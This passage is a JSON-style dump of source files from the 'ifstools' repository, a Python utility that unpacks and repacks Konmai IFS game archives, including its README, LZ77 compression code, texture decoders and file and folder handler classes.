{}'.format(indiv.tag))\n canvas = ImageCanvas(folder, canvas_size, canvas_contents, self)\n self.files[canvas.name] = canvas\n" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.5516178607940674, "avg_line_length": 23.961538314819336, "blob_id": "776ef5fe40eb45ca359ecd0d1065e0ef32b30004", "content_id": "90ce88ff1cf3b0bd10eabc7c9a18c1432f0ef3f2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 649, "license_type": "permissive", "max_line_length": 
51, "num_lines": 26, "path": "/ifstools/utils.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "import errno\nimport os\n\ndef mkdir_silent(dir):\n try: # python 3\n FileExistsError\n try:\n os.mkdir(dir)\n except FileExistsError:\n pass\n except NameError: # python 2\n try:\n os.mkdir(dir)\n except OSError as e:\n if e.errno == errno.EEXIST:\n pass\n else:\n raise\n\ndef save_with_timestamp(filename, data, timestamp):\n mkdir_silent(os.path.dirname(filename))\n with open(filename, 'wb') as f:\n f.write(data)\n # we store invalid timestamps as -1\n if timestamp >= 0:\n os.utime(filename, (timestamp,timestamp))\n" }, { "alpha_fraction": 0.6126697063446045, "alphanum_fraction": 0.6147813200950623, "avg_line_length": 41.6184196472168, "blob_id": "a3c04ff3714e3f69eabcca2d24c446ac057f144c", "content_id": "9ef59bd3c641884dfb6f256cfe21bb0140be32f4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3315, "license_type": "permissive", "max_line_length": 96, "num_lines": 76, "path": "/README.md", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "# ifstools\r\nExtractor for Konmai IFS files.\r\n\r\n## Features\r\n- Converts all textures to png without requiring a second program\r\n- Repacks without ingame display issues\r\n- Multithreaded recompression\r\n- Only changed textures are recompressed, the rest are cached\r\n- Works on eacloud music ifs files\r\n- Correctly names files under `afp`, `bsi` and `geo` folders\r\n- Converts internal binary xmls to plaintext, to facilitate further experimentation.\r\n- Dumps the ifs manifest so you can explore the format\r\n\r\n## Install\r\nJust want an exe? [Download the latest](https://github.com/mon/ifstools/releases).\r\n\r\nHave Python installed? Do this:\r\n`pip install ifstools` \r\nThen run `ifstools` from anywhere in a command prompt.\r\n\r\n## Usage\r\n```\r\nusage: ifstools [-h] [-e] [-y] [-o OUT_DIR] [--tex-only] [-c]\r\n [--bounds] [--uv] [--no-cache] [-m] [-s] [-r]\r\n file_to_unpack.ifs|folder_to_repack_ifs\r\n [file_to_unpack.ifs|folder_to_repack_ifs ...]\r\n\r\nUnpack/pack IFS files and textures\r\n\r\npositional arguments:\r\n file_to_unpack.ifs|folder_to_repack_ifs\r\n files/folders to process. Files will be unpacked,\r\n folders will be repacked\r\n\r\noptional arguments:\r\n -h, --help show this help message and exit\r\n -e, --extract-folders\r\n do not repack folders, instead unpack any IFS files\r\n inside them\r\n -y don't prompt for file/folder overwrite\r\n -o OUT_DIR output directory\r\n --tex-only only extract textures\r\n -c, --canvas dump the image canvas as defined by the\r\n texturelist.xml in _canvas.png\r\n --bounds draw image bounds on the exported canvas in red\r\n --uv crop images to uvrect (usually 1px smaller than\r\n imgrect). 
Forces --tex-only\r\n --no-cache ignore texture cache, recompress all\r\n --rename-dupes if two files have the same name but differing case\r\n (A.png vs a.png) rename the second as \"a (1).png\" to\r\n allow both to be extracted on Windows\r\n -m, --extract-manifest\r\n extract the IFS manifest for inspection\r\n --super-disable only extract files unique to this IFS, do not follow\r\n \"super\" parent references at all\r\n --super-skip-bad if a \"super\" IFS reference has a checksum mismatch, do\r\n not extract it\r\n --super-abort-if-bad if a \"super\" IFS reference has a checksum mismatch,\r\n cancel and display an error\r\n -s, --silent don't display files as they are processed\r\n -r, --norecurse if file contains another IFS, don't extract its\r\n contents\r\n```\r\n\r\n## Build an exe\r\n`pip install pyinstaller` \r\n`pyinstaller ifstools_bin.py --onefile -n ifstools` \r\nRecommend doing this in a fresh venv so the module finder doesn't include more than required.\r\n\r\nNotes:\r\n- dxt5 texture repacking is not fully supported - they will silently be converted to argb8888rev\r\n\r\nTodo:\r\n- Recursive repacking for ifs inside ifs\r\n\r\nI hope the rest is self explanatory. Confused? Create a new issue and tell me what docs to add.\r\n" }, { "alpha_fraction": 0.5206963419914246, "alphanum_fraction": 0.6263055801391602, "avg_line_length": 31.86554527282715, "blob_id": "2a0574aa7bcbfbe6b907418a3ee66eab82c850c0", "content_id": "a06418c8cf0a1608fb5f8160bc067dfa2733cc74", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3792, "license_type": "permissive", "max_line_length": 86, "num_lines": 119, "path": "/ifstools/handlers/lz77.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "# consistency with py 2/3\nfrom builtins import bytes\nfrom struct import unpack, pack\nfrom io import BytesIO\n\nfrom tqdm import tqdm\n\nWINDOW_SIZE = 0x1000\nWINDOW_MASK = WINDOW_SIZE - 1\nTHRESHOLD = 3\nINPLACE_THRESHOLD = 0xA\nLOOK_RANGE = 0x200\nMAX_LEN = 0xF + THRESHOLD\n\ndef decompress(input):\n    input = BytesIO(input)\n    decompressed = bytearray()\n\n    while True:\n        # wrap in bytes for py2\n        flag = bytes(input.read(1))[0]\n        for i in range(8):\n            if (flag >> i) & 1 == 1:\n                decompressed.append(input.read(1)[0])\n            else:\n                w = unpack('>H', input.read(2))[0]\n                position = (w >> 4)\n                length = (w & 0x0F) + THRESHOLD\n                if position == 0:\n                    return bytes(decompressed)\n\n                if position > len(decompressed):\n                    diff = position - len(decompressed)\n                    diff = min(diff, length)\n                    decompressed.extend([0]*diff)\n                    length -= diff\n                # optimise\n                if -position+length < 0:\n                    decompressed.extend(decompressed[-position:-position+length])\n                else:\n                    for loop in range(length):\n                        decompressed.append(decompressed[-position])\n\ndef match_window(in_data, offset):\n    '''Find the longest match for the string starting at offset in the preceding data\n    '''\n    window_start = max(offset - WINDOW_MASK, 0)\n\n    for n in range(MAX_LEN, THRESHOLD-1, -1):\n        window_end = min(offset + n, len(in_data))\n        # we've not got enough data left for a meaningful result\n        if window_end - offset < THRESHOLD:\n            return None\n        str_to_find = in_data[offset:window_end]\n        idx = in_data.rfind(str_to_find, window_start, window_end-n)\n        if idx != -1:\n            code_offset = offset - idx # - 1\n            code_len = len(str_to_find)\n            return (code_offset, code_len)\n\n    return None\n\ndef compress(input, progress = False):\n    pbar = tqdm(total = len(input), leave = False, unit = 'b', unit_scale = True,\n                desc = 
'Compressing', disable = not progress)\n compressed = bytearray()\n input = bytes([0]*WINDOW_SIZE) + bytes(input)\n input_size = len(input)\n current_pos = WINDOW_SIZE\n bit = 0\n while current_pos < input_size:\n flag_byte = 0;\n buf = bytearray()\n for _ in range(8):\n if current_pos >= input_size:\n bit = 0;\n else:\n match = match_window(input, current_pos)\n if match:\n pos, length = match\n info = (pos << 4) | ((length - THRESHOLD) & 0x0F)\n buf.extend(pack('>H', info))\n bit = 0\n current_pos += length\n pbar.update(length)\n else:\n buf.append(input[current_pos])\n current_pos += 1\n pbar.update(1)\n bit = 1\n flag_byte = (flag_byte >> 1) | ((bit & 1) << 7)\n compressed.append(flag_byte)\n compressed.extend(buf)\n compressed.append(0)\n compressed.append(0)\n compressed.append(0)\n\n pbar.close()\n return bytes(compressed)\n\ndef compress_dummy(input):\n input_length = len(input)\n compressed = bytearray()\n\n extra_bytes = input_length % 8\n\n for i in range(0, input_length-extra_bytes, 8):\n compressed.append(0xFF)\n compressed.extend(input[i:i+8])\n\n if extra_bytes > 0:\n compressed.append(0xFF >> (8 - extra_bytes))\n compressed.extend(input[-extra_bytes:])\n\n compressed.append(0)\n compressed.append(0)\n compressed.append(0)\n\n return bytes(compressed)\n" }, { "alpha_fraction": 0.7297297120094299, "alphanum_fraction": 0.7837837934494019, "avg_line_length": 6.400000095367432, "blob_id": "f86d8a001bdfb48f52033a2cdbeb3a04aeb4e58a", "content_id": "e57c90af7d867c9a0897620422ac74c8a0dfcb29", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 37, "license_type": "permissive", "max_line_length": 12, "num_lines": 5, "path": "/requirements.txt", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "lxml\ntqdm\npillow\nfuture\nkbinxml>=1.5\n" }, { "alpha_fraction": 0.5206963419914246, "alphanum_fraction": 0.6263055801391602, "avg_line_length": 35.92856979370117, "blob_id": "8719b938ef6bb55061f1f72396f6d074bccb134e", "content_id": "60d7d4fca94001cdb1dbe219b9fa8b232a4c7097", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2585, "license_type": "permissive", "max_line_length": 92, "num_lines": 70, "path": "/ifstools/handlers/ImageDecoders.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from io import BytesIO\nfrom struct import unpack, pack\n\nfrom PIL import Image\nfrom tqdm import tqdm\n\n# header for a standard DDS with DXT5 compression and RGBA pixels\n# gap placed for image height/width insertion\ndxt_start = b'DDS |\\x00\\x00\\x00\\x07\\x10\\x00\\x00'\n\ndxt_middle = b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + \\\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + \\\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + \\\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \\x00\\x00\\x00\\x04' + \\\n b'\\x00\\x00\\x00'\n\ndxt_end = b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' + \\\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00' + \\\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n\ndef check_size(ifs_img, data, bytes_per_pixel):\n need = ifs_img.img_size[0] * ifs_img.img_size[1] * bytes_per_pixel\n if len(data) < need:\n tqdm.write('WARNING: Not enough image data for {}, padding'.format(ifs_img.name))\n data += b'\\x00' * (need-len(data))\n 
return data\n\ndef decode_argb8888rev(ifs_img, data):\n data = check_size(ifs_img, data, 4)\n return Image.frombytes('RGBA', ifs_img.img_size, data, 'raw', 'BGRA')\n\ndef encode_argb8888rev(ifs_img, image):\n return image.tobytes('raw', 'BGRA')\n\ndef decode_argb4444(ifs_img, data):\n data = check_size(ifs_img, data, 2)\n im = Image.frombytes('RGBA', ifs_img.img_size, data, 'raw', 'RGBA;4B')\n # there's no BGRA;4B\n r, g, b, a = im.split()\n return Image.merge('RGBA', (b, g, r, a))\n\ndef decode_dxt(ifs_img, data, version):\n b = BytesIO()\n b.write(dxt_start)\n b.write(pack('<2I', ifs_img.img_size[1], ifs_img.img_size[0]))\n b.write(dxt_middle)\n b.write(version)\n b.write(dxt_end)\n # the data has swapped endianness for every WORD\n l = len(data)//2\n big = unpack('>{}H'.format(l), data)\n little = pack('<{}H'.format(l), *big)\n b.write(little)\n return Image.open(b)\n\ndef decode_dxt5(ifs_img, data):\n return decode_dxt(ifs_img, data, b'DXT5')\n\ndef decode_dxt1(ifs_img, data):\n return decode_dxt(ifs_img, data, b'DXT1')\n\n\nimage_formats = {\n 'argb8888rev' : {'decoder': decode_argb8888rev, 'encoder': encode_argb8888rev},\n 'argb4444' : {'decoder': decode_argb4444, 'encoder': None},\n 'dxt1' : {'decoder': decode_dxt1, 'encoder': None},\n 'dxt5' : {'decoder': decode_dxt5, 'encoder': None},\n}\n\ncachable_formats = [key for key, val in image_formats.items() if val['encoder'] is not None]\n" }, { "alpha_fraction": 0.5880597233772278, "alphanum_fraction": 0.5945273637771606, "avg_line_length": 36.22222137451172, "blob_id": "18f3845c028d02a7e6e6f43511ccc2f26d91af08", "content_id": "0dc8e531cd31b37a3597cf2e9bd36220e9905cba", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2010, "license_type": "permissive", "max_line_length": 100, "num_lines": 54, "path": "/ifstools/handlers/MD5Folder.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from hashlib import md5\n\nfrom kbinxml import KBinXML\n\nfrom . 
import GenericFolder\n\nclass MD5Folder(GenericFolder):\n\n def __init__(self, ifs_data, parent, obj, path = '', name = '', supers = None,\n super_disable = False, super_skip_bad = False,\n super_abort_if_bad = False, md5_tag = None, extension = None):\n GenericFolder.__init__(self, ifs_data, parent, obj, path, name, supers,\n super_disable, super_skip_bad, super_abort_if_bad)\n self.md5_tag = md5_tag if md5_tag else self.name\n self.extension = extension\n\n def tree_complete(self):\n GenericFolder.tree_complete(self)\n\n self.info_kbin = None\n self.info_file = None\n for filename, file in self.files.items():\n if filename.endswith('.xml'):\n self.info_file = file\n break\n if not self.info_file:\n #raise KeyError('MD5 folder contents have no mapping xml')\n # _super_ references to info XML breaks things - just extract what we can\n return\n\n self.info_kbin = KBinXML(self.info_file.load(convert_kbin = False))\n self._apply_md5()\n\n def _apply_md5(self):\n # findall needs xpath or it'll only search direct children\n names = (tag.attrib['name'] for tag in self.info_kbin.xml_doc.findall('.//' + self.md5_tag))\n self._apply_md5_folder(names, self)\n\n def _apply_md5_folder(self, plain_list, folder):\n for plain in plain_list:\n hashed = md5(plain.encode(self.info_kbin.encoding)).hexdigest()\n\n if self.extension:\n plain += self.extension\n\n # add correct packed name to deobfuscated filesystems\n if plain in folder.files:\n folder.files[plain]._packed_name = hashed\n\n # deobfuscate packed filesystems\n if hashed in folder.files:\n orig = folder.files.pop(hashed)\n orig.name = plain\n folder.files[plain] = orig\n" }, { "alpha_fraction": 0.8085106611251831, "alphanum_fraction": 0.8085106611251831, "avg_line_length": 14.666666984558105, "blob_id": "9bcc3ec89497ea05b3d28e97c23238214e696f93", "content_id": "53a75dfbaff34cac8d30e42a6504bec11d727108", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "permissive", "max_line_length": 29, "num_lines": 3, "path": "/ifstools_bin.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from ifstools import ifstools\n\nifstools.main()\n" }, { "alpha_fraction": 0.5551425218582153, "alphanum_fraction": 0.5625774264335632, "avg_line_length": 34.08695602416992, "blob_id": "ae5e5db819ced9a9c7f1fe03bc82af11f7744c9a", "content_id": "1bf06f7dbb0d42510b39e1eae592529a6c849f4e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 807, "license_type": "permissive", "max_line_length": 73, "num_lines": 23, "path": "/ifstools/handlers/AfpFolder.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from . 
import MD5Folder\n\nclass AfpFolder(MD5Folder):\n\n def tree_complete(self):\n MD5Folder.tree_complete(self)\n if not self.info_kbin:\n return\n\n # findall needs xpath or it'll only search direct children\n names = []\n geo_names = []\n for tag in self.info_kbin.xml_doc.findall('.//' + self.md5_tag):\n name = tag.attrib['name']\n names.append(name)\n for geo in tag.findall('geo'):\n for shape in self._split_ints(geo.text):\n geo_names.append('{}_shape{}'.format(name, shape))\n\n if 'bsi' in self.folders:\n self._apply_md5_folder(names, self.folders['bsi'])\n if 'geo' in self.parent.folders:\n self._apply_md5_folder(geo_names, self.parent.folders['geo'])\n" }, { "alpha_fraction": 0.5792483687400818, "alphanum_fraction": 0.584967315196991, "avg_line_length": 31.210525512695312, "blob_id": "798607cd2d10c24cb5fc9c1d696c779c68ecfac2", "content_id": "3901f1cd5bcb807f409881b5cbc5b3620b738ac4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2448, "license_type": "permissive", "max_line_length": 87, "num_lines": 76, "path": "/ifstools/handlers/GenericFile.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "import os\n\nfrom kbinxml import KBinXML\nimport lxml.etree as etree\n\nfrom .Node import Node\nfrom .. import utils\n\nclass GenericFile(Node):\n def from_xml(self, element):\n info = self._split_ints(element.text)\n # sometimes we don't get a timestamp\n if len(info) == 2:\n self.start, self.size = info\n self.time = -1\n else:\n self.start, self.size, self.time = info\n\n def from_filesystem(self, folder):\n self.base_path = self.parent.base_path\n self.time = int(os.path.getmtime(self.disk_path))\n self.start = self.size = None\n\n def extract(self, base, **kwargs):\n data = self.load(**kwargs)\n path = os.path.join(base, self.full_path)\n utils.save_with_timestamp(path, data, self.time)\n\n def load(self, **kwargs):\n if self.from_ifs:\n return self._load_from_ifs(**kwargs)\n else:\n return self._load_from_filesystem(**kwargs)\n\n def _load_from_ifs(self, convert_kbin = True, **kwargs):\n data = self.ifs_data.get(self.start, self.size)\n\n if convert_kbin and self.name.endswith('.xml') and KBinXML.is_binary_xml(data):\n data = KBinXML(data).to_text().encode('utf8')\n return data\n\n def _load_from_filesystem(self, **kwargs):\n with open(self.disk_path, 'rb') as f:\n ret = f.read()\n self.size = len(ret)\n return ret\n\n @property\n def needs_preload(self):\n return False\n\n def preload(self, **kwargs):\n pass\n\n def repack(self, manifest, data_blob, tqdm_progress, **kwargs):\n if tqdm_progress:\n tqdm_progress.write(self.full_path)\n tqdm_progress.update(1)\n elem = etree.SubElement(manifest, self.packed_name)\n elem.attrib['__type'] = '3s32'\n data = self.load(convert_kbin = False, **kwargs)\n if self.name.endswith('.xml') and not KBinXML.is_binary_xml(data):\n data = KBinXML(data).to_binary()\n # offset, size, timestamp\n elem.text = '{} {} {}'.format(len(data_blob.getvalue()), len(data), self.time)\n data_blob.write(data)\n # 16 byte alignment\n align = len(data) % 16\n if align:\n data_blob.write(b'\\0' * (16-align))\n\n @property\n def disk_path(self):\n if self.from_ifs:\n raise Exception('disk_path invalid for IFS file')\n return os.path.join(self.base_path, self.full_path)\n" }, { "alpha_fraction": 0.5557634830474854, "alphanum_fraction": 0.5658682584762573, "avg_line_length": 33.92156982421875, "blob_id": "6334e62abf7faabd6c48e73f83ffb905e1a338ed", "content_id": 
"c9c775ae191293c3882c5e94d007d13b18544a38", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5344, "license_type": "permissive", "max_line_length": 114, "num_lines": 153, "path": "/ifstools/handlers/ImageFile.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from io import BytesIO\nfrom struct import unpack, pack\nfrom os.path import getmtime, isfile, join, dirname\nfrom os import utime, mkdir\nimport errno\n\nfrom PIL import Image\nimport lxml.etree as etree\nfrom kbinxml import KBinXML\n\nfrom . import GenericFile\nfrom . import lz77\nfrom .ImageDecoders import image_formats, cachable_formats\nfrom .. import utils\n\nclass ImageFile(GenericFile):\n def __init__(self, ifs_data, obj, parent = None, path = '', name = ''):\n raise Exception('ImageFile must be instantiated from existing GenericFile with ImageFile.upgrade_generic')\n\n @classmethod\n def upgrade_generic(cls, gen_file, image_elem, fmt, compress):\n self = gen_file\n self.__class__ = cls\n\n self.format = fmt\n self.compress = compress\n\n # all values are multiplied by 2, odd values have never been seen\n self.uvrect = [x//2 for x in self._split_ints(image_elem.find('uvrect').text)]\n self.imgrect = [x//2 for x in self._split_ints(image_elem.find('imgrect').text)]\n self.img_size = (\n self.imgrect[1]-self.imgrect[0],\n self.imgrect[3]-self.imgrect[2]\n )\n self.uv_size = (\n self.uvrect[1]-self.uvrect[0],\n self.uvrect[3]-self.uvrect[2]\n )\n\n def extract(self, base, use_cache = True, **kwargs):\n GenericFile.extract(self, base, **kwargs)\n\n if use_cache and self.compress and self.from_ifs and self.format in cachable_formats:\n self.write_cache(GenericFile._load_from_ifs(self, **kwargs), base)\n\n def _load_from_ifs(self, crop_to_uvrect = False, **kwargs):\n data = GenericFile._load_from_ifs(self, **kwargs)\n\n if self.compress == 'avslz':\n uncompressed_size = unpack('>I', data[:4])[0]\n compressed_size = unpack('>I', data[4:8])[0]\n # sometimes the headers are missing: not actually compressed\n # The 2 extra u32 are moved to the end of the file\n # Quality file format.\n if len(data) == compressed_size + 8:\n data = data[8:]\n data = lz77.decompress(data)\n assert len(data) == uncompressed_size\n else:\n data = data[8:] + data[:8]\n\n if self.format in image_formats:\n decoder = image_formats[self.format]['decoder']\n im = decoder(self, data)\n else:\n raise NotImplementedError('Unknown format {}'.format(self.format))\n\n if crop_to_uvrect:\n start_x = self.uvrect[0] - self.imgrect[0]\n start_y = self.uvrect[2] - self.imgrect[2]\n dims = (\n start_x,\n start_y,\n start_x + self.uv_size[0],\n start_y + self.uv_size[1],\n )\n im = im.crop(dims)\n\n b = BytesIO()\n im.save(b, format = 'PNG')\n return b.getvalue()\n\n def repack(self, manifest, data_blob, tqdm_progress, **kwargs):\n if tqdm_progress:\n tqdm_progress.write(self.full_path)\n tqdm_progress.update(1)\n\n if self.compress == 'avslz':\n data = self.read_cache()\n else:\n data = self._load_im()\n\n # offset, size, timestamp\n elem = etree.SubElement(manifest, self.packed_name)\n elem.attrib['__type'] = '3s32'\n elem.text = '{} {} {}'.format(len(data_blob.getvalue()), len(data), self.time)\n data_blob.write(data)\n # 16 byte alignment\n align = len(data) % 16\n if align:\n data_blob.write(b'\\0' * (16-align))\n\n def _load_im(self):\n data = self.load()\n\n im = Image.open(BytesIO(data))\n if im.mode != 'RGBA':\n im = im.convert('RGBA')\n\n if self.format in image_formats:\n encoder 
= image_formats[self.format]['encoder']\n if encoder is None:\n # everything else becomes argb8888rev\n encoder = image_formats['argb8888rev']['encoder']\n data = encoder(self, im)\n else:\n raise NotImplementedError('Unknown format {}'.format(self.format))\n\n return data\n\n @property\n def needs_preload(self):\n cache = join(dirname(self.disk_path), '_cache', self._packed_name)\n if isfile(cache):\n mtime = int(getmtime(cache))\n if self.time <= mtime:\n return False\n return True\n\n def preload(self, use_cache = True, tex_suffix = None, **kwargs):\n if not self.needs_preload and use_cache:\n return\n # Not cached/out of date, compressing\n data = self._load_im()\n uncompressed_size = len(data)\n data = lz77.compress(data)\n compressed_size = len(data)\n data = pack('>I', uncompressed_size) + pack('>I', compressed_size) + data\n self.write_cache(data)\n\n def write_cache(self, data, base = None):\n if not self.from_ifs:\n base = self.base_path\n cache = join(base, self.path, '_cache', self._packed_name)\n utils.mkdir_silent(dirname(cache))\n with open(cache, 'wb') as f:\n f.write(data)\n utime(cache, (self.time, self.time))\n\n def read_cache(self):\n cache = join(dirname(self.disk_path), '_cache', self._packed_name)\n with open(cache, 'rb') as f:\n return f.read()\n\n" }, { "alpha_fraction": 0.8247422575950623, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 31.33333396911621, "blob_id": "8cc4cea8ca01b0744043c269fd8e8fa936f46577", "content_id": "fcb007af58ae907f07e57f965abbf3115f457e91", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 97, "license_type": "permissive", "max_line_length": 48, "num_lines": 3, "path": "/ifstools/__init__.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from .ifstools import main\nfrom .ifs import IFS\nfrom .handlers import GenericFolder, GenericFile\n" }, { "alpha_fraction": 0.8346773982048035, "alphanum_fraction": 0.8427419066429138, "avg_line_length": 26.55555534362793, "blob_id": "ac256b7cb2a70049068f0ef11cf26dfcfaa4f48c", "content_id": "3320ceb48ca2efd973ebd05d6d0b11fe33664574", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 248, "license_type": "permissive", "max_line_length": 45, "num_lines": 9, "path": "/ifstools/handlers/__init__.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from .Node import Node\n\nfrom .GenericFile import GenericFile\nfrom .ImageFile import ImageFile\n\nfrom .GenericFolder import GenericFolder\nfrom .MD5Folder import MD5Folder\nfrom .AfpFolder import AfpFolder\nfrom .TexFolder import TexFolder, ImageCanvas\n" }, { "alpha_fraction": 0.5277777910232544, "alphanum_fraction": 0.5319148898124695, "avg_line_length": 23.507246017456055, "blob_id": "e8e326256e8de7e5996dc83f32b2bf1b852701f2", "content_id": "27d3583640d8ec3aa2f312bec02f78c277ea058c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1692, "license_type": "permissive", "max_line_length": 81, "num_lines": 69, "path": "/ifstools/handlers/Node.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "import os\n\nimport lxml.etree as etree\n\nescapes = [\n ('_E', '.'),\n ('__', '_'),\n]\n\nclass Node(object):\n\n def __init__(self, ifs_data, obj, parent = None, path = '', name = ''):\n self.ifs_data = ifs_data\n self.parent = parent\n self.path = path\n self.name = name\n # xml sanitisation performed by the 
property\n self._packed_name = name\n self.time = None\n if isinstance(obj, etree._Element):\n self.from_ifs = True\n self.from_xml(obj)\n else:\n self.from_ifs = False\n self.from_filesystem(obj)\n\n def from_xml(self, elem):\n raise NotImplementedError\n\n def from_filesystem(self, path):\n raise NotImplementedError\n\n def tree_complete(self):\n '''Call this when the entire tree is parsed and ready for modification'''\n pass\n\n def __str__(self):\n return os.path.join(self.path, self.name)\n\n def __repr__(self):\n return '<{}: {}>'.format(self.__class__.__name__, self.full_path)\n\n @property\n def packed_name(self):\n return self.sanitize_name(self._packed_name)\n\n @property\n def full_path(self):\n return os.path.join(self.path, self.name)\n\n @staticmethod\n def sanitize_name(n):\n for e in escapes[::-1]:\n n = n.replace(e[1], e[0])\n if n[0].isdigit():\n n = '_' + n\n return n\n\n @staticmethod\n def fix_name(n):\n for e in escapes:\n n = n.replace(*e)\n if n[0] == '_' and n[1].isdigit():\n n = n[1:]\n return n\n\n @staticmethod\n def _split_ints(text, delim = ' '):\n return list(map(int, text.split(delim)))\n\n" }, { "alpha_fraction": 0.5428440570831299, "alphanum_fraction": 0.5462043881416321, "avg_line_length": 39.66459655761719, "blob_id": "a036338c73c42353720373c6d0900a84614f84a7", "content_id": "acf88ef76299e41d937bd197a399e478bc11cb49", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6547, "license_type": "permissive", "max_line_length": 138, "num_lines": 161, "path": "/ifstools/handlers/GenericFolder.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from itertools import chain\nfrom os.path import getmtime, basename, dirname, join, realpath, isfile\nfrom collections import OrderedDict\n\nimport lxml.etree as etree\nfrom tqdm import tqdm\n\nfrom . import GenericFile\nfrom .Node import Node\n\nclass GenericFolder(Node):\n\n def __init__(self, ifs_data, obj, parent = None, path = '', name = '',\n supers = None, super_disable = False, super_skip_bad = False,\n super_abort_if_bad = False):\n # circular dependencies mean we import here\n from . import AfpFolder, TexFolder\n self.folder_handlers = {\n 'afp' : AfpFolder,\n 'tex' : TexFolder,\n }\n self.supers = supers if supers else []\n self.super_disable = super_disable\n self.super_skip_bad = super_skip_bad\n self.super_abort_if_bad = super_abort_if_bad\n Node.__init__(self, ifs_data, obj, parent, path, name)\n\n file_handler = GenericFile\n\n def from_xml(self, element):\n if element.text:\n self.time = int(element.text)\n\n self.files = OrderedDict()\n self.folders = {}\n\n my_path = dirname(realpath(self.ifs_data.file.name))\n # muh circular deps\n from ..ifs import IFS\n\n for child in element.iterchildren(tag=etree.Element):\n filename = Node.fix_name(child.tag)\n if filename == '_info_': # metadata\n continue\n elif filename == '_super_': # sub-reference\n if self.super_disable:\n continue\n\n super_file = join(my_path, child.text)\n if not isfile(super_file):\n raise IOError('IFS references super-IFS {} but it does not exist. 
Use --super-disable to ignore.'.format(child.text))\n\n md5_expected = None\n if list(child) and child[0].tag == 'md5':\n md5_expected = bytearray.fromhex(child[0].text)\n\n super_ifs = IFS(super_file, super_skip_bad=self.super_skip_bad,\n super_abort_if_bad=self.super_abort_if_bad)\n super_ifs.md5_good = (super_ifs.manifest_md5 == md5_expected) # add our own sentinel\n if not super_ifs.md5_good:\n super_msg = 'IFS references super-IFS {} with MD5 {} but the actual MD5 is {}. One IFS may be corrupt.'.format(\n child.text, md5_expected.hex(), super_ifs.manifest_md5.hex()\n )\n if self.super_abort_if_bad:\n raise IOError(super_msg + ' Aborting.')\n elif self.super_skip_bad:\n tqdm.write('WARNING: {} Skipping all files it contains.'.format(super_msg))\n else:\n tqdm.write('WARNING: {}'.format(super_msg))\n\n self.supers.append(super_ifs)\n # folder: has children or timestamp only, and isn't a reference\n elif (list(child) or len(child.text.split(' ')) == 1) and child[0].tag != 'i':\n handler = self.folder_handlers.get(filename, GenericFolder)\n self.folders[filename] = handler(self.ifs_data, child, self, self.full_path, filename, self.supers,\n self.super_disable, self.super_skip_bad, self.super_abort_if_bad)\n else: # file\n if list(child) and child[0].tag == 'i':\n if self.super_disable:\n continue\n\n # backref\n super_ref = int(child[0].text)\n if super_ref > len(self.supers):\n raise IOError('IFS references super-IFS {} but we only have {}'.format(super_ref, len(self.supers)))\n\n super_ifs = self.supers[super_ref - 1]\n if not super_ifs.md5_good and self.super_skip_bad:\n continue\n\n super_files = super_ifs.tree.all_files\n try:\n super_file = next(x for x in super_files if (\n # seen in Sunny Park files: references to MD5 name instead of base\n x.name == filename or x.packed_name == Node.sanitize_name(filename)\n ))\n except StopIteration:\n raise IOError('IFS references super-IFS entry {} in {} but it does not exist'.format(filename, super_ifs.ifs_out))\n\n self.files[filename] = super_file\n else:\n self.files[filename] = self.file_handler(self.ifs_data, child, self, self.full_path, filename)\n\n if not self.full_path: # root\n 